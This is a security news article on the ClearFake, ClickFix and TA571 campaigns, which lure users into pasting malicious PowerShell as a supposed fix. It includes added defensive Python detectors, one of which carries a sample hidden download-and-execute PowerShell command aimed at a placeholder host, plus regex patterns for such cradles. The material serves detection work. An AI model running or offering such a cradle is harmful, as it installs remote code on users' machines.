CSO Online
Beware PowerShell: Too-helpful users tricked into ‘fixing’ their machines with malware


It’s bad enough that crooks foist malware on us for their profit – now some are persuading users to do their work for them. Security researchers have identified a technique using social engineering to persuade users to copy and run malicious PowerShell scripts that infect their computers with multiple forms of malware.

ClearFake

Researchers at Proofpoint first saw the technique in early April in the ClearFake campaign, which compromises legitimate websites with malicious HTML and JavaScript. A malicious script, hosted on blockchain via Binance’s Smart Chain contracts (a technique known as “EtherHiding”), would load. It in turn downloaded another script which, if the user continued to browse, ultimately presented its victim with a popup claiming that there was a site error, and that they should install a “root certificate” to correct the problem. Helpfully, it offered a button to click to download the “certificate” and provided instructions on how to install it using PowerShell.

This installation led to a series of other PowerShell executions that downloaded various malicious payloads, which, in campaigns in May, included installing a crypto miner and a program that replaced cryptocurrency addresses in the Windows clipboard with those directing the funds to the threat actor.

However, to defeat detection, the scripts first performed checks to ensure the user was not operating in a virtual machine or sandbox (a common way for researchers to vet suspicious sites without compromising their machines); if a VM or sandbox was detected, the script exited without performing its malicious activities.
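The clipboard-replacement payload described above swaps a cryptocurrency address the user has just copied for one belonging to the attacker. A simple host-side heuristic can catch that behaviour, because a legitimate user rarely copies two different addresses of the same type within a second or two, whereas a hijacker rewrites the clipboard almost immediately after the copy. The following detector is an added illustration, not code from Proofpoint's research or from this article; it assumes a clipboard monitor that polls the clipboard and records (timestamp, text) snapshots, and the address patterns and the sample timeline are constructed for the example.

```python
"""Heuristic detection of clipboard cryptocurrency-address swapping.

Added example (not the article's or Proofpoint's code). Assumes a polling
clipboard monitor that yields (timestamp_seconds, text) snapshots; the
address patterns are approximate and the timeline below is constructed.
"""
import re
from dataclasses import dataclass

# Approximate address shapes, for illustration only (assumption: these are
# the address families the monitored user actually works with).
ADDRESS_PATTERNS = {
    "btc_legacy": re.compile(r"^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$"),
    "btc_bech32": re.compile(r"^bc1[a-z0-9]{25,59}$"),
    "eth": re.compile(r"^0x[0-9a-fA-F]{40}$"),
}


def address_kind(text):
    """Return the address family the text looks like, or None."""
    text = text.strip()
    for kind, pattern in ADDRESS_PATTERNS.items():
        if pattern.match(text):
            return kind
    return None


@dataclass(frozen=True)
class Alert:
    at: float            # time of the suspicious clipboard change
    kind: str            # address family that was swapped
    original: str        # what the user copied
    replaced_with: str   # what the clipboard held afterwards


def detect_swaps(snapshots, window_seconds=3.0):
    """Flag clipboard changes where an address was replaced by a different
    address of the same family within window_seconds of the last change.

    Repeated snapshots with identical content (normal for a polling monitor)
    are ignored; only the time since the previous *change* is measured.
    """
    alerts = []
    last_text = None
    last_change_t = None
    for t, text in snapshots:
        if last_text is None:
            last_text, last_change_t = text, t
            continue
        if text == last_text:
            continue  # same content re-polled, not a change
        prev_kind, now_kind = address_kind(last_text), address_kind(text)
        if prev_kind and prev_kind == now_kind and t - last_change_t <= window_seconds:
            alerts.append(Alert(t, now_kind, last_text.strip(), text.strip()))
        last_text, last_change_t = text, t
    return alerts


# Constructed sample data: synthetic, non-existent addresses.
USER_ADDR = "0x" + "a1" * 20
ATTACKER_ADDR = "0x" + "b2" * 20
OTHER_ADDR = "0x" + "c3" * 20

SAMPLE_TIMELINE = [
    (0.0, "meeting notes for Tuesday"),
    (10.0, USER_ADDR),       # user copies their own address
    (10.2, USER_ADDR),       # monitor re-polls, nothing changed
    (10.5, ATTACKER_ADDR),   # silently rewritten half a second later
    (60.0, "shopping list"),
    (90.0, USER_ADDR),
    (130.0, OTHER_ADDR),     # user copied a different address 40 s later: benign
]

if __name__ == "__main__":
    for alert in detect_swaps(SAMPLE_TIMELINE):
        print(f"t={alert.at}: {alert.kind} address {alert.original} "
              f"replaced by {alert.replaced_with}")
```

The window is the tuning knob: a short window keeps false positives low for users who legitimately paste several addresses in a row, while a hijacker that rewrites on every clipboard change will still be caught on the first swap.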

ClickFix

Another threat actor popped up a message saying something had gone wrong while displaying a web page, and (surprise!) the user should copy the code for a fix and install it using PowerShell. As with ClearFake, it provided clear instructions on how to “patch” the system. Proofpoint said that this exploit lasted only a few days before becoming inactive, and a few days later, it was replaced by the ClearFake exploit. “As the pley[.]es domain itself seems to be compromised, it’s unclear if these two activity sets – ClearFake and ClickFix – started to work with each other, or if the ClearFake actor re-compromised the iframe, replacing the code with its own content,” Proofpoint said in its blog post. Regardless, the ClearFake compromise remains active on sites originally infected with ClickFix.

“The lures are effective,” said David Shipley, CEO and cofounder of Beauceron Security, “because they’re aimed at helping people, use language regular folks see but don’t understand (certificates) and look close enough to real dialogue buttons that if you’re busy, inexperienced, or feeling frustrated, look real enough.”

Spoofing Microsoft Word errors

Another threat actor, TA571, sent emails containing attachments resembling Microsoft Word, and, when they were opened, displayed an error message claiming that the “Word Online” browser extension was missing. Both the “how to fix” and “Auto-fix” buttons led to the same result: malware.

This threat actor continues to refine its attack, changing error messages and enticements to users to run PowerShell scripts that install malware, Proofpoint said.

“This is criminal innovation in the wake of moves by Microsoft and security tools to catch and stop previous techniques that relied a lot on macros in file attachments,” Shipley noted. “It’s smart, can be delivered via links in phishing e-mails or via poisoned ad networks or via attachments, so it’s a multi-use scalable tool.”

Common techniques

The threat actors may have been borrowing ideas from each other. “In all cases, both via the fake updates or the HTML attachments, the malicious PowerShell/CMD script is copied to the clipboard via browser-side JavaScript, commonly used on legitimate sites too,” Proofpoint said. These techniques, and the fact that antivirus software and EDRs have difficulty inspecting clipboard content, make it hard to detect and block attacks of this nature unless protection is in place before the user accesses the malicious site.
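Because the clipboard itself is a blind spot, the first point where a defender reliably sees this chain is when the pasted script is actually launched: a PowerShell process started by the user's own desktop shell, carrying a download-and-execute one-liner, hidden-window or policy-bypass switches, an encoded command, or the virtual-machine probing mentioned earlier. The triage routine below is an added example, not Proofpoint's or CSO's code. It assumes process-creation telemetry in the shape of Sysmon Event ID 1 (Image, ParentImage, CommandLine fields) and assumes that a command pasted into the Run box or a console is launched with explorer.exe as its parent; the indicator weights, the threshold and the sample events are constructed for the example.

```python
"""Score PowerShell process-creation events for "paste this fix" execution.

Added example (not the article's or Proofpoint's code). Assumes Sysmon
Event ID 1 style records with Image, ParentImage and CommandLine, and that
user-pasted commands are launched with explorer.exe as the parent process.
Weights, threshold and sample events are constructed.
"""
import re
from dataclasses import dataclass

# Indicator patterns, matched case-insensitively against the command line.
DOWNLOAD = re.compile(
    r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|"
    r"net\.webclient|start-bitstransfer|curl|wget)\b", re.I)
EXECUTE = re.compile(r"\b(iex|invoke-expression)\b", re.I)
HIDDEN_OR_BYPASS = re.compile(
    r"-(w|windowstyle)\s+hidden|-(ep|executionpolicy)\s+bypass|-nop\b|-noprofile\b", re.I)
ENCODED = re.compile(r"-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)
VM_PROBE = re.compile(r"win32_computersystem|vmware|virtualbox|hyper-v|qemu", re.I)

INTERACTIVE_PARENTS = {"explorer.exe"}        # assumption: user-typed/pasted commands
POWERSHELL_HOSTS = {"powershell.exe", "pwsh.exe"}
THRESHOLD = 5                                 # constructed tuning value


@dataclass
class Verdict:
    score: int
    reasons: list

    def flagged(self):
        return self.score >= THRESHOLD


def basename(path):
    """Last path component, lower-cased, for Windows or POSIX separators."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def triage(event):
    """Score one process-creation event and explain the score."""
    if basename(event["Image"]) not in POWERSHELL_HOSTS:
        return Verdict(0, ["not a PowerShell host"])
    cmd = event["CommandLine"]
    score, reasons = 0, []
    if basename(event["ParentImage"]) in INTERACTIVE_PARENTS:
        score += 3
        reasons.append("launched from the interactive shell (typed or pasted by the user)")
    if DOWNLOAD.search(cmd) and EXECUTE.search(cmd):
        score += 4
        reasons.append("download-and-execute cradle")
    if HIDDEN_OR_BYPASS.search(cmd):
        score += 2
        reasons.append("hidden window or execution-policy bypass")
    if ENCODED.search(cmd):
        score += 2
        reasons.append("encoded command")
    if VM_PROBE.search(cmd):
        score += 2
        reasons.append("virtual machine / sandbox probing")
    return Verdict(score, reasons)


def flagged_indices(events):
    """Indices of events whose score reaches the threshold."""
    return [i for i, e in enumerate(events) if triage(e).flagged()]


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"

# Constructed sample events; fix.example.invalid is a placeholder host.
SAMPLE_EVENTS = [
    {"Image": PS, "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\nightly-backup.ps1"},
    {"Image": PS, "ParentImage": EXPLORER,
     "CommandLine": 'powershell -w hidden -ep bypass -c "iex (iwr http://fix.example.invalid/cert)"'},
    {"Image": PS, "ParentImage": EXPLORER,
     "CommandLine": "powershell.exe Get-Process | Sort-Object CPU"},
    {"Image": PS, "ParentImage": EXPLORER,
     "CommandLine": "powershell -enc QQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAA=="},
    {"Image": r"C:\Windows\System32\notepad.exe", "ParentImage": EXPLORER,
     "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    for i, event in enumerate(SAMPLE_EVENTS):
        verdict = triage(event)
        print(i, "FLAG" if verdict.flagged() else "ok  ", verdict.score, verdict.reasons)
```

The scheduled backup script (event 0) carries an execution-policy bypass but was not launched by the user's shell and downloads nothing, so it stays below the threshold; the interactive Get-Process call (event 2) is user-launched but otherwise unremarkable. The two events that reach the threshold are exactly the shapes this article describes: a shell-launched download cradle and a shell-launched encoded command.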

However, it said in its blog post, “This attack chain requires significant user interaction to be successful. The social engineering in the fake error messages is clever and purports to be an authoritative notification coming from the operating system. It also provides both the problem and a solution so that a viewer may take prompt action without pausing to consider the risk. The attack chain is unique and aligns with the overall trend Proofpoint has observed of cybercriminal threat actors adopting new, varied, and increasingly creative attack chains – including improving social engineering, nested PowerShell, and the use of WebDAV and SMB – to enable malware delivery.

“Organizations should train users to identify the activity and report suspicious activity to their security teams. This is very specific training but can easily be integrated into an existing user training program.”
